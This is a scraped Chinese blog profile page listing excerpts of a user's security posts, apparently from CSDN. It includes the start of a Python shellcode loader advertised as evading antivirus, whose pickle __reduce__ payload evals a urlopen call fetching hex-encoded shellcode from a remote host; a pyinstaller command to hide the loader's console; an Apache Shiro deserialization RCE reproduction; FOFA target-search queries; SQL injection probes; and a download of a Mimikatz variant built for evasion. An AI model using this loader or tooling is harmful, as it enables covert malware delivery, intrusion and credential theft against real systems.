自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(11)
  • 资源 (1)
  • 收藏
  • 关注

原创 python生成shellcode加载器(免杀,可过杀软)

import ctypes, cPickle, base64, urllib2class ptr(object): def __reduce__(self): return(eval, ("urllib2.urlopen('http://192.168.1.100/s2.txt').read().decode('hex')",))# base64class buf(object): def __init__(self, shellcode): sel.

2020-05-31 01:52:41 3753 5

原创 pyinstaller打包exe 无界面显示

pyinstaller.exe --noconsole --onefile C:\Users\Administrator\Desktop\python\py-shellcode\Loader.py -i 16.ico -n test-i 设置应用图标-n 设置exe名称-i -n需要一起使用

2020-05-31 01:39:21 3552

原创 FOFA常用搜索语法

CVE-2019-17558Apache Solr Velocity模板远程代码执行app="Apache-Shiro"

2020-05-18 14:19:59 18283

原创 Apache Shiro反序列化远程代码执行 复现 环境搭建

docker pull medicean/vulapps:s_shiro_1docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1yum install python3-develpip3 install pycryptodomeshiro.py# pip install pycryptoimport sysimport base64import uuidfrom random import Randomimpo..

2020-05-14 10:14:02 1012

原创 Python Selenium 自动化 写入Cookies 实现 FOFA 免密登录

本章为大家分享,使用Selenium写入Cookies实现FOFA免密登录需要提前登陆获取cookies文件from selenium import webdriverimport astclass write_cookies: def __init__(self): self.driver = webdriver.Chrome() self...

2020-05-06 09:48:28 806

原创 Python Selenium模拟登录和读取/写入Cookies

本编为大家分享一下Selenium库的一些方法。简单说一下代码的功能:main主要是控制浏览器跳转到fofa的登录页面,并自动填写用户名和口令,用户手动填入图形验证码,登录成功后再控制台输入“1”即可调用write_Cookies函数生成cookies文件。因为登录时会有图形验证码限制,所以现在只能做到半自动化,需要手工输入图形验证码,后面加上验证码识别功能应该就可以实现全自动化了。...

2020-05-01 12:53:36 1873

原创 Python selenium第三方库的安装与使用

使用selenium库之前,需要安装Python3Python3环境搭建参考:https://www.runoob.com/python3/python3-install.html安装Selenium库访问:https://pypi.org/project/selenium/#files点击扩展名为.gz的源码包进行下载:下载后解压,cmd环境进入到setup.py文件...

2020-04-30 20:02:08 3013

原创 Windows cmd下载文件

Windows cmd下载文件

2019-08-30 13:22:54 8293 1

原创 初学手工SQL注入常用方法与函数

SQL注入 and 1=1 / and 1=2 回显页面不同(整形判断) 单引号判断 ‘ 显示数据库错误信息或者页面回显不同(整形,字符串类型判断) \ (转义符) -1/+1 回显下一个或上一个页面(整型判断) andsleep(5) UNION query SQL injection(可联合查询注入...

2019-08-03 11:07:28 514

原创 MuSQL常用函数

tomcatwar

2019-07-24 20:25:12 910

原创 CTF凯撒密码解密Python脚本

根据CTF一道签到题得出的思路,写了一个简单的python字符串处理 供大家参考。#!/usr/bin/python# -*- coding: UTF-8 -*-print("凯撒密码解密")#密文str = 'ggqht{ggQht_gsQ10jsf#@fopwh}'#密钥(平移位数)my = 12print(str,"密钥",my)print("密文:", end='')f...

2019-05-17 15:52:34 4395

lazykatz-master.zip

为了逃避检测和加强绕过,Lazykatz是Mimikatz的升级版本,最新版本是 lazykatz v4.0。

2020-05-07

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除